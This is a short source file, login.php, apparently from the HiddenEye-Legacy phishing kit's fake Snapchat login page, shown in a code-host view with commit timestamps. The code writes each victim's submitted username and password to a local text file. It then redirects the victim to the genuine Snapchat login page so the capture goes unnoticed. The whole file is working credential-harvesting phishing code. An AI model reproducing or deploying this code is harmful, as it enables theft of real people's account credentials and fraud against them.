HiddenEye-Legacy/WebPages/Snapchat_web/login.php

8 lines
251 B
PHP
Raw Normal View History

2018-05-01 18:11:34 +08:00
<?php
include 'base.php';
2018-06-07 17:18:50 +08:00
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.snapchat.com/accounts/login');
exit();